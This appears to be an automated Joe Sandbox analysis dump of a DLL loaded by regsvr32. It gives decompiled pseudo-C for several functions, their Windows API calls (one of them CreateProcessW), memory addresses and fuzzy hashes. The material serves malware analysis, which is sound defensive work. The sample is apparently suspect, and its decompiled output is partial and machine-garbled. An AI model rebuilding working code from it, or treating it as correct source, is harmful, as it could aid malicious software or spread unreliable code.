                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(_t43, 0x3a7e805d,  *((intOrPtr*)(_t112 + 0x50)));
                  				if (_t89 == 0) goto 0x800040ef;
                  				 *_t89();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t113 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(0x102, 0, _t72, _t91, _t110,  *((intOrPtr*)(_t113 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t110 + 0x60) =  *(_t110 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t110 + 0x60) =  *(_t110 + 0x60) & 0x00000000;
                  				return 0;
                  			}













                  0x180003fd7
                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				signed long long _t65;
                  				long long _t67;
                  				signed long long* _t71;
                  				signed long long _t78;
                  				signed long long _t85;
                  				intOrPtr _t88;
                  				struct _FILETIME* _t89;
                  				void* _t96;
                  				void* _t100;
                  				signed long long _t101;
                  				signed long long* _t102;
                  
                  				_t100 = _t96;
                  				 *((long long*)(_t100 + 0x10)) = __rbx;
                  				 *((long long*)(_t100 + 0x18)) = __rsi;
                  				 *(_t100 + 8) =  *(_t100 + 8) & 0x00000000;
                  				 *((long long*)(_t100 - 0x18)) = _t100 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t71 = _a8;
                  				if (_t71 == 0) goto 0x8000925e;
                  				_t85 = _t71 + 0x18;
                  				 *(_t71 + 0x20) = _t85;
                  				_a8[3] = _t85;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t89);
                  				EnterCriticalSection(??);
                  				_t101 = __rcx + 0x88;
                  				_t78 =  *(_t101 + 8);
                  				_a8[3] = _t101;
                  				_a8[4] = _t78;
                  				 *_t78 =  &(_a8[3]);
                  				_t65 =  &(_a8[3]);
                  				 *(_t101 + 8) = _t65;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(_t65, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t65;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t102 = _a8;
                  				_t67 =  *((intOrPtr*)(_t102 + 0x20));
                  				_t88 =  *((intOrPtr*)(_t102 + 0x18));
                  				 *_t67 = _t88;
                  				 *((long long*)(_t88 + 8)) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t67, _a8, _t88);
                  				return _t52;
                  			}
















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(void* __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t33;
                  				intOrPtr _t34;
                  				void* _t56;
                  				WCHAR* _t64;
                  				WCHAR* _t67;
                  				CHAR* _t70;
                  
                  				_t33 = _t56;
                  				 *((long long*)(_t33 + 8)) = __rbx;
                  				 *((long long*)(_t33 + 0x10)) = __rbp;
                  				 *((long long*)(_t33 + 0x18)) = __rsi;
                  				 *((long long*)(_t33 + 0x20)) = __rdi;
                  				_t34 =  *0x8000d4a0;
                  				lstrlenA(_t70);
                  				lstrlenW(_t67);
                  				lstrlenW(_t64);
                  				r8d = __rbx + _t34 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t34 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t34, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 23%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  				long long* _t80;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t80 = __rdx;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				E00000001180004994(_t39, _t41);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *_t80 = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}
















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df6
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E000000011800099F4(void* __ebx, void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t76;
                  				long long _t78;
                  				void* _t94;
                  				intOrPtr _t109;
                  				intOrPtr* _t118;
                  
                  				_t95 = __rsi;
                  				_t92 = __rdx;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t109 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t78 = __rdx;
                  				r10d =  *(_t109 + 2) & 0x0000ffff;
                  				_t118 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t76 = __r10 + _t109 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8(_t76, __rdx);
                  				goto 0x80009a53;
                  				if (_t76 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__ebx, __ecx, _t78, _t76, _t94, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t76 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(__ebx, _a8, _t78, _v56, _t95, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t118;
                  				_v88 = _v48;
                  				if (E00000001180006EB0(__ebx, __ecx,  *_t118, __ebp, _t78, _t78, _t92, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t118 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __r8, intOrPtr* __r9) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				long long _t74;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = _t74;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *((long long*)( *((intOrPtr*)(_t77 - 0x20 + 0x60)))) = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}


















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E00000001180003698(void* __ecx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t21;
                  				void* _t25;
                  				void* _t29;
                  				short _t33;
                  				signed short _t35;
                  				long long _t47;
                  				void* _t59;
                  				struct _EXCEPTION_RECORD _t62;
                  				void* _t63;
                  				void* _t68;
                  				void* _t78;
                  				void* _t79;
                  
                  				_t48 = __rbx;
                  				_t78 = _t68;
                  				 *((long long*)(_t78 + 8)) = __rbx;
                  				 *((long long*)(_t78 + 0x10)) = __rbp;
                  				_t47 =  *0x8000d4a0;
                  				_t63 = __r8;
                  				_t21 = E00000001180001000(_t20, _t29, __ecx, __rbx, _t78 - 0x20, __rdx, _t78 + 0x20, _t78, _t79, _t59);
                  				r12d = 0;
                  				if (_t21 != r12d) goto 0x8000376a;
                  				_t33 = _a32;
                  				_v38 = _t33;
                  				_v40 = _t33;
                  				_t35 = _t33 + 1 + _t33 + 1;
                  				_v54 = _t35;
                  				r8d = _t35 & 0x0000ffff;
                  				HeapAlloc(??, ??, ??);
                  				_v48 = _t47;
                  				if (_t47 == _t79) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(_t62) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t25 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t48, _v48, _t63, __rdx, __rdx, _t63);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t25;
                  			}























                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
